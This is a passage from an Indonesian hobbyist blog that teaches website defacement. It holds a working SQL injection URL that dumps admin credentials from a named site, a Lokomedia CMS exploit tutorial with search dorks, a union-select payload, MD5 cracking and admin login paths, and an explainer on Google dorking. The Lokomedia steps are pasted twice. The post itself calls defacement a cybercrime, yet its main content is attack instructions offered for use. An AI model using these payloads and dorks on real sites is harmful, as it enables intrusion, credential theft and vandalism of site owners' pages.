http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin— |
tekan Execute
dan hasilnya
Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat soba
Jumat, 21 Oktober 2016
Cara Deface Website Dengan SQL Lokomedia
Hallo blogger, maaf baru ngepost lagi soalnya kesibukan di dunia nyata.Kali ini saya akan ngebahas cara ngedeface website dengan celah/bug yang ada pada cms lokomedia.Berbicara soal teknik ini, pasti sudah tau di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini.
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1.Langsung gunakan dork ke search engine google
2.Kalo sudah dapat targetnya misalnya seperti ini http://site.com/kategori-23-hiburan.html
3.Masukan explotnya seperti ini http://site.com/kategori-23 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-hiburan.html
4.Kemudian tekan CTRL+U
5.Karena passwordnya masih dakam bentuk md5 maka harus di decrypt,saya menggunakan hashkiller bisa cari di google
6.Kemudian masukan username dan password yg tadi di dapatkan
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
-
inurl:statis-1-profil.html
- inurl:statis-2-profil.html
- inurl:statis-3-strukturorganisasi.html
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1.Langsung gunakan dork ke search engine google
2.Kalo sudah dapat targetnya misalnya seperti ini http://site.com/kategori-23-hiburan.html
3.Masukan explotnya seperti ini http://site.com/kategori-23 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-hiburan.html
4.Kemudian tekan CTRL+U
5.Karena passwordnya masih dakam bentuk md5 maka harus di decrypt,saya menggunakan hashkiller bisa cari di google
6.Kemudian masukan username dan password yg tadi di dapatkan
Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Nah kalo udah masuk berarti anda bisa ngubah apapun,ini hanya untuk sharing tutorial,untuk bertujuan membantu newbie seperti saya
Kamis, 20 Oktober 2016
Mengenal Deface Website
Deface adalah kegiatan mengubah halaman website orang lain tanpa
sepengetahuanorang tersebut pastilanya ini adalah kejahatan dunia cyber.
Deface terkenal juga dengan sebutan cybergraditti yaitu corat-coret
website tertentu. Deface itu dilakukan dengan memanfaatkan kelemahan
dari website tersebut.
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk
mencari informasi yang tepat dan akurat. Pencarian informasi secara
akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan,
terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan
tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan
penggunaan dari tiap – tiap perintah untuk mendapatkan informasi
tersembunyi dan sangat penting. Perintah – perintah tersebut antara lain
:
1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya
menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda
kutip). Pencarian akan mencari page yang mengandung kata ”password”
sebagai judulnya dengan prioritas utama ”admin”.
Jika pada pencarian terdapat dua query pencarian utama, digunakan
sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh
pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada
dua subjek utama judul yaitu ”admin” dan ”mdb”.
2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya
menghasilkan semua URL yang hanya berisi kata kunci informasi yang
dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database
mdb”.
Pencarian akan menghasilkan semua URL yang hanya mengandung informasi
tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini,
jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:”
untuk mendapatkan list url tersebut.
Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan
menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”.
Tanda garis miring slash (/) diantara dua kata etc dan passwd akan
diabaikan oleh mesin pencari Google.
3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query
informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai
contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda
kutip). Pencarian akan mencari topik tentang waveguide pada semua
halaman yang tersedia pada domain ugm.ac.id.
4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks
database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai
contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.
5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada
internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai
contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda
kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf”
yang mengandung kata Linux dan Hacking.
6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar
list web pages yang memiliki link pada web page special. Sebagai contoh:
”link:www.detik.com” akan menunjukkan daftar web page yang memiliki
point link pada halaman situs Detik.
7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page
yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian
akan memberi daftar web page yang serupa dengan homepage Detik.
8. intext:Sintaks perintah ini akan mencari kata kata pada
website tertentu. Perintah ini mengabaikan link atau URL dan judul
halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link
pada web page yang memiliki keyword yang memiliki keyword admin.
Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi
”pedang” yang bisa dimanfaatkan untuk menggali informasi yang
tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak.
Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan
suatu sistem melalui jaringan internet biasanya menggunakan google
sebagai sarana praktis untuk footprinting (penggalian data sistem yang
akan diaudit). Pada kesempatan mendatang, akan kita coba menguak
beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan
otak kanan kita.
Langganan:
Postingan (Atom)